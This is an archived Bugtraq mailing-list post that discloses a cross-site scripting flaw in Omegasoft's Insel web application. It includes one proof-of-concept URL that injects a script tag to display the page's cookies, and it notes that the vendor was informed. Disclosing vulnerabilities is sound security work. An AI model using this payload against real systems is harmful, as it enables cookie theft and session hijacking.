XSS in Omegasoft's Insel

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS in Omegasoft's Insel
From: "MC Iglo" <mc.iglo@xxxxxxxxx>
Date: Fri, 26 May 2006 16:09:00 +0200
Cc: info@xxxxxxxxxxxx
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=googlemail.com; h=received:message-id:date:from:sender:to:subject:cc:mime-version:content-type:content-transfer-encoding:content-disposition:x-google-sender-auth; b=EPJf6bEiN4wfirH6+WG2BVsPGt8GCdqAejvjUXt+qS1R+3wCK/ya9ekHMiXpzXVis0yykb4bPECiNS/27i94QSG8mV03wjlx725IUGfmMq4HhFiaF7vlq5VwioIqHlrF+XoLiw90UPBb10qJjjb4nif1k31Z4rrLNcqS+4yfsGg=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Sender: mc.iglo@xxxxxxxxxxxxxx

Hi together,

This also works on serveral web-pages of this product.
http://host/OmegaMw7a.ASP?WCI=Logon&WCE=0;<script>alert(unescape(document.cookie));</script>
There might be some ways for SQL-Injection, too, but i am not willing
to try this at the real system :)

Vendor notified as CC

regards
MC.Iglo

Prev by Date: Re: Sun single-CPU DOS
Next by Date: Docebo LMS 2.05 Remote File Include
Previous by thread: [SECURITY] [DSA 1075-1] New awstats packages fix arbitrary command execution
Next by thread: Docebo LMS 2.05 Remote File Include
Index(es):
- Date
- Thread